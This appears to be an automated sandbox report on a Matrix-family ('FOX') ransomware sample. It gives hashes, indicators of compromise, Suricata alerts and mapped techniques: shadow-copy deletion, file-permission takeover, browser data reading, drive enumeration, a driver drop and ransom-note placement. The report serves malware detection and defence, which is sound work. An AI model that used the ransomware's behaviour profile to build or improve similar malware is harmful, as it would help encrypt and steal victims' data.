matrix | 016061f330faaeffdd84628f613a719a2f617c8145909d047b5721429ee5b451

Analysis

max time kernel
158s
max time network
135s
platform
windows7_x64
resource
win7-en-20211208
submitted
01-02-2022 08:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Size

1.2MB
MD5

268360527625d09e747d9f7ab1f84da5
SHA1

09772eb89c9743d3a6d7b2709c76e9740aa4c4b1
SHA256

42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620
SHA512

07fba0c06040fe4ef5f812a52d639bdea6cbe5bf7ff4560403ad12955e6b1ff2b4615361ac4533696a6c5e12d36fb2d2e0df3da2927f6b45f154f0a4e83315e1

Score

10^/10

matrix discovery persistence ransomware spyware stealer suricata upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Backgammon\en-US\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Microsoft Games\Mahjong\es-ES\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Microsoft Games\SpiderSolitaire\de-DE\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Indiana\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\lib\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Microsoft Games\Purble Place\ja-JP\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ryugmcli.default-release\storage\default\moz-extension+++07d856df-5333-4bf9-8746-58ef2201f846^userContextId=4294967295\idb\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Google\Chrome\Application\Dictionaries\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Microsoft Games\Chess\de-DE\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Google\Chrome\Application\89.0.4389.114\WidevineCdm\_platform_specific\win_x64\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jre7\bin\server\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jre7\lib\jfr\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jre7\lib\zi\Atlantic\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Checkers\fr-FR\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Spades\en-US\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Spades\fr-FR\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Google\Chrome\Application\89.0.4389.114\default_apps\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Extensions\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jre7\lib\cmm\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Microsoft Games\FreeCell\en-US\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Microsoft Games\Minesweeper\en-US\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Microsoft Games\Minesweeper\fr-FR\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Microsoft Games\More Games\ja-JP\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Microsoft Games\Purble Place\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jre7\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Microsoft Games\Chess\en-US\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Microsoft Games\Chess\fr-FR\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe

suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity
suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity
suricata
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Blocklisted process makes network request 1 IoCs

flow	pid	Process
9	2040	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	x8OFcCor64.exe

Executes dropped EXE 64 IoCs

pid	Process
1456	NW1p1jD5.exe
304	x8OFcCor.exe
1468	x8OFcCor64.exe
1876	x8OFcCor.exe
1140	x8OFcCor.exe
1808	x8OFcCor.exe
1176	x8OFcCor.exe
2036	x8OFcCor.exe
1644	x8OFcCor.exe
1752	x8OFcCor.exe
1312	x8OFcCor.exe
616	x8OFcCor.exe
1708	x8OFcCor.exe
1964	x8OFcCor.exe
1088	x8OFcCor.exe
1576	x8OFcCor.exe
1744	x8OFcCor.exe
1876	x8OFcCor.exe
616	x8OFcCor.exe
1704	x8OFcCor.exe
576	x8OFcCor.exe
1676	x8OFcCor.exe
596	x8OFcCor.exe
1096	x8OFcCor.exe
1752	x8OFcCor.exe
1104	x8OFcCor.exe
1972	x8OFcCor.exe
804	x8OFcCor.exe
564	x8OFcCor.exe
1696	x8OFcCor.exe
796	x8OFcCor.exe
1308	x8OFcCor.exe
884	x8OFcCor.exe
1280	x8OFcCor.exe
1728	x8OFcCor.exe
1736	x8OFcCor.exe
1580	x8OFcCor.exe
1264	x8OFcCor.exe
1184	x8OFcCor.exe
1624	x8OFcCor.exe
540	x8OFcCor.exe
1920	x8OFcCor.exe
1604	x8OFcCor.exe
1972	x8OFcCor.exe
2016	x8OFcCor.exe
1628	x8OFcCor.exe
1528	x8OFcCor.exe
1172	x8OFcCor.exe
1652	x8OFcCor.exe
1648	x8OFcCor.exe
816	x8OFcCor.exe
964	x8OFcCor.exe
1728	x8OFcCor.exe
1280	x8OFcCor.exe
1352	x8OFcCor.exe
1736	x8OFcCor.exe
1184	x8OFcCor.exe
1264	x8OFcCor.exe
596	x8OFcCor.exe
1624	x8OFcCor.exe
1452	x8OFcCor.exe
1876	x8OFcCor.exe
268	x8OFcCor.exe
1244	x8OFcCor.exe

Modifies extensions of user files 1 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\RepairUnprotect.tiff	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe

Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 54 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral5/files/0x00060000000131fe-71.dat	upx
behavioral5/files/0x00060000000131fe-72.dat	upx
behavioral5/files/0x00060000000131fe-73.dat	upx
behavioral5/files/0x00060000000131fe-77.dat	upx
behavioral5/files/0x00060000000131fe-78.dat	upx
behavioral5/files/0x00060000000131fe-80.dat	upx
behavioral5/files/0x00060000000131fe-81.dat	upx
behavioral5/files/0x00060000000131fe-83.dat	upx
behavioral5/files/0x00060000000131fe-84.dat	upx
behavioral5/files/0x00060000000131fe-86.dat	upx
behavioral5/files/0x00060000000131fe-87.dat	upx
behavioral5/files/0x00060000000131fe-89.dat	upx
behavioral5/files/0x00060000000131fe-90.dat	upx
behavioral5/files/0x00060000000131fe-92.dat	upx
behavioral5/files/0x00060000000131fe-93.dat	upx
behavioral5/files/0x00060000000131fe-95.dat	upx
behavioral5/files/0x00060000000131fe-96.dat	upx
behavioral5/files/0x00060000000131fe-98.dat	upx
behavioral5/files/0x00060000000131fe-99.dat	upx
behavioral5/files/0x00060000000131fe-101.dat	upx
behavioral5/files/0x00060000000131fe-102.dat	upx
behavioral5/files/0x00060000000131fe-104.dat	upx
behavioral5/files/0x00060000000131fe-105.dat	upx
behavioral5/files/0x00060000000131fe-107.dat	upx
behavioral5/files/0x00060000000131fe-108.dat	upx
behavioral5/files/0x00060000000131fe-110.dat	upx
behavioral5/files/0x00060000000131fe-111.dat	upx
behavioral5/files/0x00060000000131fe-114.dat	upx
behavioral5/files/0x00060000000131fe-113.dat	upx
behavioral5/files/0x00060000000131fe-116.dat	upx
behavioral5/files/0x00060000000131fe-117.dat	upx
behavioral5/files/0x00060000000131fe-119.dat	upx
behavioral5/files/0x00060000000131fe-120.dat	upx
behavioral5/files/0x00060000000131fe-122.dat	upx
behavioral5/files/0x00060000000131fe-123.dat	upx
behavioral5/files/0x00060000000131fe-125.dat	upx
behavioral5/files/0x00060000000131fe-126.dat	upx
behavioral5/files/0x00060000000131fe-128.dat	upx
behavioral5/files/0x00060000000131fe-129.dat	upx
behavioral5/files/0x00060000000131fe-131.dat	upx
behavioral5/files/0x00060000000131fe-132.dat	upx
behavioral5/files/0x00060000000131fe-134.dat	upx
behavioral5/files/0x00060000000131fe-135.dat	upx
behavioral5/files/0x00060000000131fe-138.dat	upx
behavioral5/files/0x00060000000131fe-139.dat	upx
behavioral5/files/0x00060000000131fe-141.dat	upx
behavioral5/files/0x00060000000131fe-142.dat	upx
behavioral5/files/0x00060000000131fe-144.dat	upx
behavioral5/files/0x00060000000131fe-145.dat	upx
behavioral5/files/0x00060000000131fe-147.dat	upx
behavioral5/files/0x00060000000131fe-148.dat	upx
behavioral5/files/0x00060000000131fe-150.dat	upx
behavioral5/files/0x00060000000131fe-151.dat	upx
behavioral5/files/0x00060000000131fe-153.dat	upx

Loads dropped DLL 64 IoCs

pid	Process
1552	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
1552	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
916	cmd.exe
304	x8OFcCor.exe
1728	cmd.exe
1608	cmd.exe
564	cmd.exe
1520	cmd.exe
992	cmd.exe
1160	cmd.exe
240	cmd.exe
1280	cmd.exe
1728	cmd.exe
572	cmd.exe
1592	cmd.exe
576	cmd.exe
992	cmd.exe
608	cmd.exe
1700	cmd.exe
1872	cmd.exe
1628	cmd.exe
1528	cmd.exe
2040	cmd.exe
912	cmd.exe
1308	cmd.exe
2036	cmd.exe
1700	cmd.exe
1456	cmd.exe
1628	cmd.exe
1868	cmd.exe
596	cmd.exe
324	cmd.exe
1096	cmd.exe
1188	cmd.exe
1472	cmd.exe
1820	cmd.exe
1808	cmd.exe
972	cmd.exe
1964	cmd.exe
1924	cmd.exe
1676	cmd.exe
988	cmd.exe
944	cmd.exe
964	cmd.exe
1820	cmd.exe
1104	cmd.exe
1988	cmd.exe
1760	cmd.exe
1484	cmd.exe
2040	cmd.exe
1364	cmd.exe
240	cmd.exe
1308	cmd.exe
1788	cmd.exe
1104	cmd.exe
908	cmd.exe
1704	cmd.exe
1800	cmd.exe
2040	cmd.exe
1956	cmd.exe
240	cmd.exe
912	cmd.exe
1788	cmd.exe
1096	cmd.exe

Modifies file permissions 1 TTPs 38 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
668	takeown.exe
1232	takeown.exe
912	takeown.exe
1096	takeown.exe
1628	takeown.exe
1988	takeown.exe
1328	takeown.exe
1964	takeown.exe
1676	takeown.exe
1176	takeown.exe
540	takeown.exe
912	takeown.exe
324	takeown.exe
1800	takeown.exe
1808	takeown.exe
960	takeown.exe
1732	takeown.exe
1632	takeown.exe
1172	takeown.exe
1452	takeown.exe
1720	takeown.exe
1760	takeown.exe
1956	takeown.exe
1312	takeown.exe
1752	takeown.exe
1460	takeown.exe
964	takeown.exe
1876	takeown.exe
1964	takeown.exe
1456	takeown.exe
796	takeown.exe
908	takeown.exe
1640	takeown.exe
1592	takeown.exe
808	takeown.exe
1072	takeown.exe
908	takeown.exe
1956	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Drops desktop.ini file(s) 15 IoCs

description	ioc	Process
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Microsoft Games\Hearts\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Microsoft Games\Purble Place\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Public\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Microsoft Games\Mahjong\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Microsoft Games\Chess\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\S:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\K:	x8OFcCor64.exe
File opened (read-only)	\??\Q:	x8OFcCor64.exe
File opened (read-only)	\??\R:	x8OFcCor64.exe
File opened (read-only)	\??\S:	x8OFcCor64.exe
File opened (read-only)	\??\U:	x8OFcCor64.exe
File opened (read-only)	\??\Z:	x8OFcCor64.exe
File opened (read-only)	\??\W:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\Y:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\K:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\A:	x8OFcCor64.exe
File opened (read-only)	\??\B:	x8OFcCor64.exe
File opened (read-only)	\??\H:	x8OFcCor64.exe
File opened (read-only)	\??\Y:	x8OFcCor64.exe
File opened (read-only)	\??\Z:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\N:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\M:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\J:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\H:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\F:	x8OFcCor64.exe
File opened (read-only)	\??\I:	x8OFcCor64.exe
File opened (read-only)	\??\P:	x8OFcCor64.exe
File opened (read-only)	\??\O:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\W:	x8OFcCor64.exe
File opened (read-only)	\??\V:	x8OFcCor64.exe
File opened (read-only)	\??\P:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\G:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\F:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\E:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\E:	x8OFcCor64.exe
File opened (read-only)	\??\J:	x8OFcCor64.exe
File opened (read-only)	\??\M:	x8OFcCor64.exe
File opened (read-only)	\??\T:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\T:	x8OFcCor64.exe
File opened (read-only)	\??\N:	x8OFcCor64.exe
File opened (read-only)	\??\V:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\U:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\R:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\Q:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\I:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\L:	x8OFcCor64.exe
File opened (read-only)	\??\X:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\G:	x8OFcCor64.exe
File opened (read-only)	\??\O:	x8OFcCor64.exe
File opened (read-only)	\??\X:	x8OFcCor64.exe
File opened (read-only)	\??\L:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
8	myexternalip.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\8ZLwIiy4.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_ja.jar	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-heapdump_zh_CN.jar	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Thunder_Bay	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\vlc.mo	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Europe\Luxembourg	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Visualizer.zip	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\VisualElements\SmallLogo.png	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\appletrailers.luac	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Yakutat	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
